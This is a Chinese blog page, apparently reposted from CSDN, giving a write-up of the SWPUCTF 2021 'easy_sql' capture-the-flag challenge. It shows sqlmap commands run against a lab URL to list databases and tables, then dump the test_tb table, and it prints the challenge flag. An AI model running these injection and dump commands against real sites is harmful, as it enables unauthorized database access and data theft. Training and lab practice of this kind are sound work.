首页 > 数据库 >[SWPUCTF 2021 新生赛]easy_sql的write up

[SWPUCTF 2021 新生赛]easy_sql的write up

时间:2024-10-31 23:45:54浏览次数:7  
标签:sqlmap SWPUCTF wllm 数据库 db up write test tb

开启NSSCTF靶场,在浏览器中访问链接,看到让我们输入点什么还有标签页名字提示:

"参数是wllm"

直接/?wllm=1访问一下:

这里就直接用sqlmap直接爆破了:

查看数据库有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" --dbs

看到test_db就是这个数据库,其他数据库都是sql数据库的必要四个数据库,接下来就查看test_db数据库的表有哪些


查看test_db数据库的表名有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db --tables

一眼就看出test_tb这个表很关键,接下来就查看一下这个test_tb表的信息


查看test_db数据库的test_tb表的所有数据:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db -T test_tb --dump

很轻松的看出test_db表有flag列,flag列的内容就是题目所求的flag:

NSSCTF{05010966-5970-49bc-bdfd-b244ca7756cb}

标签:sqlmap,SWPUCTF,wllm,数据库,db,up,write,test,tb
From: https://blog.csdn.net/weixin_73049307/article/details/143376791

相关文章

  • 学习笔记(十七):ArkUi-气泡提示 (Popup)
    概述:Popup属性可绑定在组件上显示气泡弹窗提示,设置弹窗内容、交互逻辑和显示状态。主要用于屏幕录制、信息弹出提醒等显示状态。一、系统气泡,PopupOptions通过配置primaryButton、secondaryButton来设置带按钮的气泡 1、文本气泡常用于只展示带有文本的信息提示,不带有任何......
  • upload-labs靶场Pass-21
    upload-labs靶场Pass-21本关上传方法众多,但是应该考察的是数组后缀绕过,所以我的上传围绕此展开1.分析源码$is_upload=false;//初始化上传状态为false$msg=null;//初始化消息变量为null//检查是否有文件上传if(!empty($_FILES['upload_file'])){//定义......
  • [HCTF 2018]WarmUp
    题目链接:https://buuoj.cn/challenges#[HCTF2018]WarmUp打开环境后如下。查看页面源代码,发现存在提示"source.php"。<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"conte......
  • order by 、sort by、distribute by、group by、cluster by的区别
    1.orderby:用途:主要用于对查询结果进行排序。返回的结果集是全局有序的。SELECT*FROMemployeesORDERBYsalaryDESC;2.SORTBY用途:主要用于对分布式查询结果进行排序。每个节点(分区)分别进行排序,但返回的结果集不一定全局有序。适用于Hive等大数据处理系统。SELEC......
  • 供需指标(Supply and Demand ),供给与需求,寻找支撑压力位神器 MT4免费公式!
    指标名称:供给需求指标版本:MT4 ver.2.01供需区域指标基于市场的支撑区和阻力区,非常适合用于外汇交易。这一指标将市场供应和需求的区域划分为更广泛的价格范围,有助于识别长期有效的交易区域。使用指南-供需区域定义:供应区通常形成于价格急剧下跌后,显示出卖压强劲;需求......
  • RMAN之环境配置(二)---Backups to a Media Manager备份到介质管理器
    在生产库中,一般都选用第三方的磁带管理软件,但是基本对于oracle的备份和恢复都是通过调用RMAN来实现的。确定mediamanagerLibrary(媒体管理库)的位置在尝试将RMAN与媒体管理器一起使用之前,请确定媒体管理库的位置。分配或配置RMAN与媒体管理器通信的通道时,在命令行ALL......
  • bupt_os_lab1
    bupt_oslab1作业1.编写代码uthread.h#ifndefUTHREAD_H#defineUTHREAD_H#defineSTACK_SIZE4096enumthread_state{THREAD_INIT,THREAD_RUNNING,THREAD_STOP,THREAD_SUSPENDED,};structcontext{longlongrip,rsp,rbp,rbx,r12,r13......
  • Rollup 同步物化视图
    同步物化视图|StarRockshttps://docs.starrocks.io/zh/docs/using_starrocks/Materialized_view-single_table/同步物化视图本文介绍如何在StarRocks中创建、使用以及管理同步物化视图(Rollup)。同步物化视图下,所有对于基表的数据变更都会自动同步更新到物化视图中。您无需......
  • Rollup与查询
    Rollup与查询-ApacheDorishttps://doris.apache.org/zh-CN/docs/1.2/data-table/hit-the-rollup/Rollup与查询ROLLUP在多维分析中是“上卷”的意思,即将数据按某种指定的粒度进行进一步聚合。基本概念​在Doris中,我们将用户通过建表语句创建出来的表称为Base表(BaseT......
  • ENT-ENT Updates
    @目录一、征稿简介二、重要信息三、服务简述四、投稿须知一、征稿简介二、重要信息期刊官网:https://ais.cn/u/3eEJNv三、服务简述涵盖了与耳鼻喉科相关的广泛主题,包括诊断方法、治疗技术和预防策略。ENTUpdates旨在发表具有最高科学和临床价值的研究,并鼓励提交高质量......